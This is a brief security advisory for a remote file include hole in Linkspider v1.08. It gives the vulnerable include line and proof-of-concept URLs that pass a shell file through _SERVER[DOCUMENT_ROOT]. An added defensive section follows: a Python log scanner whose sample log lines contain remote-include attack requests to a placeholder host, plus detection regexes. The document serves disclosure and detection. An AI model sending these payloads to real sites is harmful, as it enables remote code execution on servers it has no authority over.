=============================================================
Linkspider v.1.08 Remote File Include Vulnerability
==============================================================

App Name : Linkspider v.1.08
HomePage : http://www.phoenix.frihost.net/linkspider/read_me.php
Vulnerability Discovered by : Rohit Bansal

Vuln Code:
----------------
links.php

include_once ($_SERVER['DOCUMENT_ROOT'] . "/linkspider/admin/custom.php");

also in links.inc.php

include_once ($_SERVER['DOCUMENT_ROOT'] . "/linkspider/admin/custom.php");

POC:
---------------
htttp://site.com/[path]/links.php?_SERVER[DOCUMENT_ROOT]=SHELL.txt ??
htttp://site.com/[path]/links.inc.php?_SERVER[DOCUMENT_ROOT]=SHELL.txt ??

rohitisback[at]gmail.com
================================================================
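The PoC above only works where request data can overwrite `$_SERVER['DOCUMENT_ROOT']`, i.e. PHP with register_globals enabled on a version that did not yet protect superglobals from it. The code-level fix is to build the include path from `__DIR__` or a hard-coded constant instead of anything the request can influence; the operational check is to alert on query parameters named like PHP superglobals and on parameters carrying URLs or stream wrappers where a local path is expected. The script below is an added defender-side example, not part of the advisory: it runs that check over constructed Apache combined-format log lines. The log layout, sample addresses and function names are assumptions.

```python
"""Flag requests that try to override a PHP superglobal or pass a remote
include target, e.g. links.php?_SERVER[DOCUMENT_ROOT]=http://.../x.txt?

Added example for the Linkspider RFI advisory; not part of the advisory.
Log format (Apache combined) and sample traffic are constructed assumptions.
"""
import re
from urllib.parse import urlsplit, parse_qsl

# Constructed sample log lines (documentation-range addresses, not real traffic).
SAMPLE_LOG = """\
203.0.113.5 - - [10/Oct/2023:13:55:36 +0000] "GET /linkspider/links.php?_SERVER[DOCUMENT_ROOT]=http://198.51.100.7/x.txt? HTTP/1.1" 200 512 "-" "Mozilla/5.0"
203.0.113.5 - - [10/Oct/2023:13:55:37 +0000] "GET /linkspider/links.inc.php?_SERVER%5BDOCUMENT_ROOT%5D=ftp://198.51.100.7/x HTTP/1.1" 200 512 "-" "Mozilla/5.0"
192.0.2.10 - - [10/Oct/2023:13:56:01 +0000] "GET /linkspider/links.php?cat=3&page=2 HTTP/1.1" 200 4096 "-" "Mozilla/5.0"
192.0.2.11 - - [10/Oct/2023:13:56:10 +0000] "GET /linkspider/links.php?GLOBALS[conf]=1 HTTP/1.1" 200 4096 "-" "curl/7.88"
"""

# Apache combined log: ip ident user [time] "METHOD target PROTO" status ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) \S+" (?P<status>\d{3})'
)

# Parameter names that, under register_globals, would land in a superglobal.
SUPERGLOBAL_RE = re.compile(
    r'^(?:GLOBALS|_SERVER|_GET|_POST|_COOKIE|_REQUEST|_FILES|_ENV|_SESSION)\[',
    re.IGNORECASE,
)
# Values that would point include()/include_once() away from a local file.
REMOTE_VALUE_RE = re.compile(r'^(?:https?|ftps?|php|data|expect)://', re.IGNORECASE)


def analyze_request(target):
    """Return the list of reasons a request target looks like an RFI attempt.

    An empty list means nothing suspicious was found. parse_qsl already
    percent-decodes names and values, so encoded brackets are handled.
    """
    reasons = []
    query = urlsplit(target).query
    for name, value in parse_qsl(query, keep_blank_values=True):
        if SUPERGLOBAL_RE.match(name):
            reasons.append(f"superglobal override attempt via parameter '{name}'")
        if REMOTE_VALUE_RE.match(value.strip()):
            reasons.append(f"remote/stream URL in parameter '{name}'")
    return reasons


def scan_log(text):
    """Parse each log line and collect findings for suspicious requests."""
    findings = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # skip lines that do not fit the assumed format
        reasons = analyze_request(m['target'])
        if reasons:
            findings.append({'ip': m['ip'], 'ts': m['ts'],
                             'target': m['target'], 'reasons': reasons})
    return findings


if __name__ == '__main__':
    for f in scan_log(SAMPLE_LOG):
        print(f"{f['ip']} {f['ts']} {f['target']}")
        for r in f['reasons']:
            print(f"    - {r}")
```

Both names and values are checked independently, so a request that only smuggles a superglobal name (`GLOBALS[conf]=1`) and one that only carries a remote URL in an ordinary parameter are both reported; a request doing both, as in the advisory's PoC, yields two reasons. The pattern lists are deliberately small and case-insensitive; extend them for the wrappers your PHP build actually enables.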